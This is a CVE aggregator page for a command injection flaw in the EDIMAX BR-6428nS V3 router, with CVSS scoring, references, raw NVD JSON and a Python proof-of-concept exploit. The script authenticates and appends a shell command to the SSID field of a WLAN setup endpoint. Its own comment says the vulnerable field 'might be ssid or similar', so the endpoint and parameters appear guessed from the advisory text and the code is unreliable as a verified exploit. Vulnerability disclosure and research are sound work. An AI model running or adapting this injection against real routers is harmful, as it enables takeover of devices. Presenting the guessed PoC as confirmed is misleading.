CVE-2026-36734

Description

EDIMAX BR-6428nS V3 1.15 is vulnerable to Command Injection. An authenticated attacker with access to the network can submit crafted input to the WLAN configuration functionality. Due to insufficient input validation, the attacker is able to execute arbitrary system commands on the device.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

EDIMAX BR-6428nS V3 1.15

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""POC for CVE-2026-36734 - EDIMAX Command Injection"""
import requests

# Target configuration
TARGET_IP = "192.168.1.1"
USERNAME = "admin"
PASSWORD = "password"

def exploit():
    session = requests.Session()
    
    # Step 1: Authenticate (Low privilege required)
    login_url = f"http://{TARGET_IP}/login"
    login_data = {"user": USERNAME, "pwd": PASSWORD}
    session.post(login_url, data=login_data)
    
    # Step 2: Send payload to WLAN configuration
    # Injecting a command to echo a specific string to verify execution
    # Example payload: ; echo "CVE-2026-36734_POC" > /tmp/poc.txt
    payload = "; echo CVE-2026-36734_POC > /tmp/poc.txt"
    
    exploit_url = f"http://{TARGET_IP}/goform/wlanBasicSetup"
    
    # The vulnerable field might be 'ssid' or similar based on the description
    data = {
        "ssid": "TestNetwork" + payload,
        "action": "Apply"
    }
    
    try:
        response = session.post(exploit_url, data=data)
        if response.status_code == 200:
            print("[+] Payload sent successfully.")
            print("[+] Check /tmp/poc.txt on the device to verify command execution.")
        else:
            print(f"[-] Failed to send payload. Status code: {response.status_code}")
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-36734
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-36734
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-36734/
[4] VulDB https://vuldb.com/cve/CVE-2026-36734
[5] http://edimax.com
[6] https://github.com/theShinigami/CVE-Disclosures/tree/main/CVE-2026-36734

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-36734", "sourceIdentifier": "[email protected]", "published": "2026-05-11T20:25:41.563", "lastModified": "2026-05-13T15:46:19.993", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "EDIMAX BR-6428nS V3 1.15 is vulnerable to Command Injection. An authenticated attacker with access to the network can submit crafted input to the WLAN configuration functionality. Due to insufficient input validation, the attacker is able to execute arbitrary system commands on the device."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-77"}]}], "references": [{"url": "http://edimax.com", "source": "[email protected]"}, {"url": "https://github.com/theShinigami/CVE-Disclosures/tree/main/CVE-2026-36734", "source": "[email protected]"}]}}